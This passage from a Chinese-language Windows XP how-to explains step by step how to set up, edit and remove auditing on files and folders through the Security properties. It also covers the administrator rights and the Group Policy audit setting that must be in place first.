3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性”命令,接着在弹出的窗口中选择“安全”标签。
4)单击“高级”按钮,然后选择“审核”标签。
5)根据具体情况选择你的操作:
倘若对一个新组或用户设置审核,可以单击“添加”按钮,并且在“名称”框中键入新用户名,然后单击“确定”按钮打开“审核项目”对话框。
要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑”按钮。
要删除原有的组或用户审核,可以选择用户名,然后单击“删除”按钮即可。
6)如有必要的话,在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。
7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。
注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前,你必须启用组策略中“审核策略”的“审核对象访问”。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。